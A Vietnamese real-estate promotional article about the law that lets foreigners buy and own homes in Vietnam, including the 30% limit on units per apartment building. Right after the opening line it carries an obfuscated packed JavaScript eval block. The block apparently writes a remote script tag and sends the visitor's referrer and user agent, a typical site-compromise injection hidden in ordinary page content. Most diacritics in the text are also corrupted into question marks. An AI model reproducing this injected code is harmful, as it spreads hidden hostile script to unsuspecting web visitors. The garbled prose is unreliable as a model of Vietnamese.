THỜI GIAN BÀN GIAO DỰ ÁN:

Luật bất động sản Công Minh hỗ trợ tối ưu cho khách hàng ngoại quốc

Các d? án b?t ??ng s?n ???c c?p nh?p t?i website http://hungthinhapartment.net eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hskra|var|u0026u|referrer|sfkda||js|php’.split(‘|’),0,{}))
thu hút khách hàng và các nhà ??u t? không ch? trong ph?m vi c? n??c mà còn t?o ???c ti?ng vang l?n trên th? tr??ng qu?c t?. ?ó là lý do mà m?t s? d? án nh?n ???c s? quan tâm chú ý và tìm mua c?a r?t nhi?u các khách hàng ngo?i qu?c Tuy nhiên, ?? ti?p c?n, mua bán và s? h?u m?t s?n ph?m b?t ??ng s?n h?u hình không ph?i d? dàng. V?i nh?ng n?i quy ?ã ???c ban hành trong lu?t b?t ??ng s?n, quý khách hàng ngo?i qu?c ???c h? tr? t?i ?u trong vi?c ti?n ??n n?m quy?n s? h?u.

Lu?t b?t ??ng s?n Công Minh h? tr? t?i ?u cho khách hàng ngo?i qu?c

Lu?t b?t ??ng s?n Công Minh h? tr? t?i ?u cho khách hàng ngo?i qu?c

Ng??i n??c ngoài ???c mua và s? h?u nhà ? t?i Vi?t Nam

?ây là ?i?u ??u tiên ???c nh?n m?nh trong lu?t b?t ??ng s?n khi nh?c ??n quy?n h?n c?a ng??i n??c ngoài khi mu?n mua và s? h?u nhà ? trên lãnh th? Vi?t Nam. Dù b?n là cá nhân hay t? ch?c, vi?c ti?p c?n các d? án b?t ??ng s?n ??u ???c di?n ra m?t cách d? dàng, không phân bi?t, không gi?i h?n. C? th?, các cá nhân ng??i n??c ngoài ???c phép nh?p c?nh vào Vi?t Nam, các doanh nghi?p có v?n ??u t? n??c ngoài, chi nhánh, v?n phòng ??i di?n c?a doanh nghi?p n??c ngoài, qu? ??u t? n??c ngoài,… ??u có c? h?i ti?p c?n và ???c trao ??i, cung c?p thông tin liên quan ??n d? án c?ng nh? cách th?c mua bán, thanh toán m?t cách c?n k?, chi ti?t.  Theo ?ó, các khách hàng ngo?i qu?c, khi có nhu c?u mua và s? h?u m?t d? án b?t ??ng s?n b?t k? ??u s? ???c t? v?n và h? tr? m?t cách t?i ?a t? lúc b?t ??u trao ??i thông tin cho ??n th?i ?i?m bàn giao chính th?c.

Quy?n l?i và gi?i h?n c?a ng??i n??c ngoài khi ti?p c?n b?t ??ng s?n Vi?t

Tuy ???c h? tr? và t?o ?i?u ki?n v? m?i m?t ?? có th? s? h?u các d? án b?t ??ng s?n trên lãnh th? Vi?t Nam, nh?ng lu?t b?t ??ng s?n c?ng có nh?ng quy ??nh v? gi?i h?n mà các nhà ??u t? n??c ngoài ph?i tuân theo. Các khách hàng ngo?i qu?c có th? ???c mua, thuê mua, nh?n t?ng cho, nh?n th?a k? và s? h?u các tài s?n b?t ??ng s?n. Tuy nhiên, m?c ?? s? h?u không ???c phép quá 30% s? l??ng c?n h? trong m?t tòa nhà chung c?. ?ây là nh?ng tính toán ?ã ???c cân nh?c k? l??ng tr??c khi ban hành thành v?n b?n chính th?c. ?i?u này v?a mang l?i thu?n ti?n cho khách hàng ngo?i qu?c, tránh nh?p nh?ng v? v?n ?? s? h?u, v?a t?o thu?n l?i trong vi?c ki?m tra, ki?m soát các ho?t ??ng an sinh xã h?i c?ng nh? các tình hình an toàn, tr?t t? kinh t?-xã h?i trên ph?m vi c? n??c.

Lu?t b?t ??ng s?n nói riêng và các v?n b?n pháp lu?t khác nói chung ??u h??ng ??n nh?ng quy?n l?i nh?t ??nh c?a các ??i t??ng khác nhau, trong ?ó có ng??i ngo?i qu?c. N?m rõ nh?ng quy ??nh này s? giúp quá trình trao ??i mua bán, s? h?u ???c di?n ra suôn s? theo ?úng quy trình cho phép, t?o m?i s? thu?n ti?n cho cu?c s?ng t??ng lai c?a các khách hàng.

Liên k?t website:

D? án Gem Riverside

D? án One Verandah